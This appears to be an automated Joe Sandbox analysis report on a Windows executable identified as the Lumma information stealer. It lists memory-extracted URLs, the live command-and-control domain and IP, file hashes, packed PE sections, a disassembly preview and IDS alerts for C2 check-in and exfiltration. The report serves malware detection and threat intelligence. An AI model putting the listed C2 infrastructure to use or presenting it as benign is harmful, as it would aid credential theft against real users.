                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl00WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://ocsp.rootca1.amazontrust.com0:0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.ecosia.org/newtab/0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://ac.ecosia.org/autocomplete?q=0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://discokeyus.lat:443/apifi0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://discokeyus.lat/20WO49yZcDA.exe, 00000000.00000002.2515977981.0000000006137000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://discokeyus.lat//0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://discokeyus.lat/0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2439195494.00000000019EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://discokeyus.lat/qMZ1L0WO49yZcDA.exe, 00000000.00000003.2462352801.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2480307316.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437684688.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2467059353.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2503433908.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74770WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://discokeyus.lat/F0WO49yZcDA.exe, 00000000.00000003.2385788262.000000000611F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://discokeyus.lat:443/api0WO49yZcDA.exe, 0WO49yZcDA.exe, 00000000.00000003.2503662736.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2438974726.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462451964.0000000001962000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://discokeyus.lat/apiTEZG20WO49yZcDA.exe, 00000000.00000003.2412003165.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2411900089.0000000006129000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		unknown

                                                                                                                        World Map of Contacted IPs

                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs

                                                                                                                        Public IPs

                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        104.21.21.99
                                                                                                                        		discokeyus.latUnited States
                                                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                                                        General Information

                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                        Analysis ID:1578981
                                                                                                                        Start date and time:2024-12-20 17:23:23 +01:00
                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                        Overall analysis duration:0h 5m 31s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:full
                                                                                                                        Cookbook file name:default.jbs
                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                        Number of analysed new started processes analysed:4
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:0
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Sample name:0WO49yZcDA.exe
                                                                                                                        renamed because original name is a hash value
                                                                                                                        Original Sample Name:91e4f1ab8170b4af79ec38f14533f6c4.exe
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@3/1
                                                                                                                        EGA Information:Failed
                                                                                                                        HCA Information:
                                                                                                                        • Successful, ratio: 100%
                                                                                                                        • Number of executed functions: 0
                                                                                                                        • Number of non-executed functions: 4
                                                                                                                        Cookbook Comments:
                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                        • Stop behavior analysis, all processes terminated

                                                                                                                        Warnings

                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                        • Excluded IPs from analysis (whitelisted): 40.126.53.14, 172.202.163.200
                                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                        • Execution Graph export aborted for target 0WO49yZcDA.exe, PID 1732 because there are no executed function
                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                        • VT rate limit hit for: 0WO49yZcDA.exe

                                                                                                                        Simulations

                                                                                                                        Behavior and APIs

                                                                                                                        TimeTypeDescription
                                                                                                                        11:24:41API Interceptor10x Sleep call for process: 0WO49yZcDA.exe modified

                                                                                                                        Joe Sandbox View / Context

                                                                                                                        IPs

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        104.21.21.99uDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                          u1z7S3hr06.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                            NAliwxUTJ4.exeGet hashmaliciousLummaCBrowse
                                                                                                                              1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                gJkNLYV0ax.exeGet hashmaliciousLummaCBrowse
                                                                                                                                  m21jm5y5Z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                    gEfWplq0xQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      gNjo8FIKN5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        f48jWpQ2F8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          RZnZbS97dD.exeGet hashmaliciousLummaCBrowse

                                                                                                                                            Domains

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            discokeyus.latuDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            u1z7S3hr06.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            zhQFKte2vX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            ddySsHnC6l.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            NAliwxUTJ4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            XNtOBQ5NHr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            rEK6Z2DVp8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170

                                                                                                                                            ASNs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            CLOUDFLARENETUSuDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            u1z7S3hr06.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            zhQFKte2vX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            http://www.eventcreate.com/e/you-have-received-a-new-docGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                            • 104.17.25.14
                                                                                                                                            ddySsHnC6l.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            NAliwxUTJ4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            XNtOBQ5NHr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 172.67.197.170
                                                                                                                                            1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            http://email.mg.mylearninghub.com/c/eJyUzr9OxCAcAOCngc2Gf6UwMBjPeiZ3i4nJeRuF3vWXUlBKz9anNw5OTu7f8HlDnacU94Y2XEhKJFF4MPqinXaO1KLXyhHbKKuJrLUinXVKKgyGESYoo5oyKkVT-UbwWrva876RjikkyHStpi30NkeI12HpKpcmHMxQyvuM-D1iLWKt70Oxv-ivR6y1SxkQay-Q53JIV4htCiF9HiCOiLcu-f4hxQvkCfHdG23G7vixvj4v9XY80ePTeHoJqzz79XGvzivZf51P4w0Qk-AR30muFM7GbnHJVWfzCBEJ4i2AG-ButnHc0k-jKhmX_83xzbDvAAAA__-qL3HaGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.18.42.227

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e1uDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            u1z7S3hr06.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            zhQFKte2vX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            ddySsHnC6l.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            NAliwxUTJ4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            XNtOBQ5NHr.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            Z8oTIWCyDE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            1QNOKwVoOT.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            BB4S2ErvqK.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.21.99
                                                                                                                                            rEK6Z2DVp8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.21.99

                                                                                                                                            Dropped Files

                                                                                                                                            No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            No created / dropped files found

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):7.94821066835375
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:0WO49yZcDA.exe
                                                                                                                                            File size:1'870'848 bytes
                                                                                                                                            MD5:91e4f1ab8170b4af79ec38f14533f6c4
                                                                                                                                            SHA1:1b34ee9ec2d2bb2f861a30f7adc6c878e27511ec
                                                                                                                                            SHA256:bb5655c486554fcceffdd7df4042befb5e22f3226713f4987292203773c984d0
                                                                                                                                            SHA512:e3938ad828ef36edb936e7987d51600dd6220ed27395d090a265d73dd98d5e75ebcf85e63ca7127624f46e6262162350ce9d67e99a2e60a9627ed99633ece3c9
                                                                                                                                            SSDEEP:24576:JnCGpfcaWhSNkJNmDSxcqO5few3DGJHfpPMGS66AjU0QruzpAEbrVKTxyioOJLW+:JCfaWhCkJNmpWoDuHBx4AdQqdbrEoWn
                                                                                                                                            TLSH:838533131F017A47EF2955B820DBE33584F863898B3E3554A52B9D2E2CB930ACD7D16E
                                                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................J...........@..........................0J.....s.....@.................................T0..h..

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x8a0000
                                                                                                                                            Entrypoint Section:.taggant
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:6
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:6
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:6
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            jmp 00007F65CCC915AAh
                                                                                                                                            punpckhdq mm3, qword ptr [eax+eax]
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            jmp 00007F65CCC935A5h
                                                                                                                                            add byte ptr [edi], al
                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], dh
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [ecx], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [ecx], al
                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            pop es
                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], dh
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [ebp+00000080h], dh
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], dh
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [edx+00000000h], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax+eax], ah
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            pop es
                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            pop es
                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], dh
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], cl
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [edx], ah
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [ecx], al
                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                            add byte ptr [eax], al
                                                                                                                                            add byte ptr [eax], al

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x1ac.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            0x10000x510000x248006a23a69cc931f9c1603ee9e45e3a5f53False0.9974047517123288data7.977841389176462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .rsrc0x520000x1ac0x20075720b8ea60aa06a31806981b744f74eFalse0.5390625data5.245569576626531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            0x540000x2aa0000x20052bec2648188e2b10eaaa383b24b412aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            isktfjdo0x2fe0000x1a10000x1a060090f6790f393d4507b4d15fde9e32d535False0.9946853422395677data7.954008306742392IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            rvricfai0x49f0000x10000x6004bd4e6440ab61a61bbc820620db128b1False0.5872395833333334data5.024395069592203IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .taggant0x4a00000x30000x22003695dcee0fd4111c2b79410b04d3b91dFalse0.06502757352941177DOS executable (COM)0.6698012633534087IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                            Resources

                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            RT_MANIFEST0x520580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                                                            Imports

                                                                                                                                            DLLImport
                                                                                                                                            kernel32.dlllstrcpy

                                                                                                                                            Network Behavior

                                                                                                                                            Suricata IDS Alerts

                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2024-12-20T17:24:42.007547+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.5629121.1.1.153UDP
                                                                                                                                            2024-12-20T17:24:42.151073+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.5577951.1.1.153UDP
                                                                                                                                            2024-12-20T17:24:42.292481+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.5546181.1.1.153UDP
                                                                                                                                            2024-12-20T17:24:43.662669+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.549717104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:43.662669+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549717104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:44.423127+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549717104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:44.423127+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549717104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:45.850636+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.549721104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:45.850636+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549721104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:46.842774+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549721104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:46.842774+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549721104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:48.675771+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.549724104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:48.675771+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549724104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:51.065025+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.549727104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:51.065025+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549727104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:53.773140+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.549728104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:53.773140+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549728104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:56.161439+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.549731104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:56.161439+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549731104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:57.205488+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549731104.21.21.99443TCP
                                                                                                                                            2024-12-20T17:24:58.990580+01002058361ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI)1192.168.2.549732104.21.21.99443TCP
